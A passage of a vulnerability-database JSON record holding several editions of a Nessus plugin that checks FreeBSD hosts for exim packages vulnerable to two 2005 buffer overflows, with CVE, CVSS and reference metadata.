script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # http://www.freebsd.org/ports/portaudit/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbdb4e3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:26:09"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", 
"cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ce6c77754f241a397e5d44de94decf8e2a0d0184b56b6b00eebebbf31607793d", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "d4e7b139ddbea34a2d42ac93ee7d2776", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "modified"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "31dea9af1907301899091b16d13e9400", "key": "references"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2017-10-29T13:43:47", "modified": 
"2016-12-08T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?cdbdb4e3", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2016 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:42:12 $\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # http://www.freebsd.org/ports/portaudit/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbdb4e3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2016 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2017-10-29T13:43:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "1. 
The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "5f19553b2032ed74aeabcca84272374c4b5d1776ba2e1fc43dd83505187a514a", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "d4e7b139ddbea34a2d42ac93ee7d2776", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "f73a7def4acb756ae33e8fc8d23622eb", "key": "modified"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "31dea9af1907301899091b16d13e9400", "key": "references"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2018-08-30T19:54:13", "modified": "2016-12-08T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?cdbdb4e3", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2016 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:42:12 $\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # http://www.freebsd.org/ports/portaudit/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdbdb4e3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2016 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:54:13"}], "edition": 9, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "b09dad3a1a106eb7ecf8cc564c192cdc"}, {"key": "cvelist", "hash": "56682bdf77751f0db7701f0a4be98d1e"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "description", "hash": "a2c4080bb75aa646d3d46cc3e994631a"}, {"key": "href", "hash": "c4c9410778877f2ff6b63b54f4a33cb5"}, {"key": "modified", "hash": 
"55b5f288c0c073cab7832e1f46b617e7"}, {"key": "naslFamily", "hash": "fe45aa727b58c1249bf04cfb7b4e6ae0"}, {"key": "pluginID", "hash": "cc34f605458c15226bb56a2d79f3d62c"}, {"key": "published", "hash": "9024ab754ee339f101e22cbcc0c75129"}, {"key": "references", "hash": "09cd0998f21b6811e8f5438ddcb628f2"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "767faad1c1a0bac1dea68a1424024c69"}, {"key": "title", "hash": "54fda255863604b985f16abe0a76639e"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "16815c800a3c847b124ff6cb5bc842e9837966a0b192fe482682aa2021e78082", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0022", "CVE-2005-0021"]}, {"type": "nessus", "idList": ["UBUNTU_USN-56-1.NASL", "EXIM_SPA_IPV6_OVERFLOW.NASL", "FEDORA_2005-001.NASL", "FEDORA_2005-002.NASL", "REDHAT-RHSA-2005-025.NASL", "GENTOO_GLSA-200501-23.NASL", "DEBIAN_DSA-637.NASL", "DEBIAN_DSA-635.NASL"]}, {"type": "gentoo", "idList": ["GLSA-200501-23"]}, {"type": "freebsd", "idList": ["CA9CE879-5EBB-11D9-A01C-0050569F0001"]}, {"type": "openvas", "idList": ["OPENVAS:54809", "OPENVAS:52252", "OPENVAS:53472", "OPENVAS:53474"]}, {"type": "ubuntu", "idList": ["USN-56-1"]}, {"type": "redhat", "idList": ["RHSA-2005:025"]}, {"type": "osvdb", "idList": ["OSVDB:12946", "OSVDB:12726", "OSVDB:12727"]}, {"type": "exploitdb", "idList": ["EDB-ID:1009", "EDB-ID:756"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:7533", "SECURITYVULNS:DOC:7534"]}, {"type": "debian", "idList": ["DEBIAN:DSA-635-1:15035", "DEBIAN:DSA-637-1:4973F"]}, {"type": "cert", "idList": ["VU:132992"]}], "modified": "2019-02-21T01:08:40"}, "score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 
Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/23 12:49:57\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fdf1ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n 
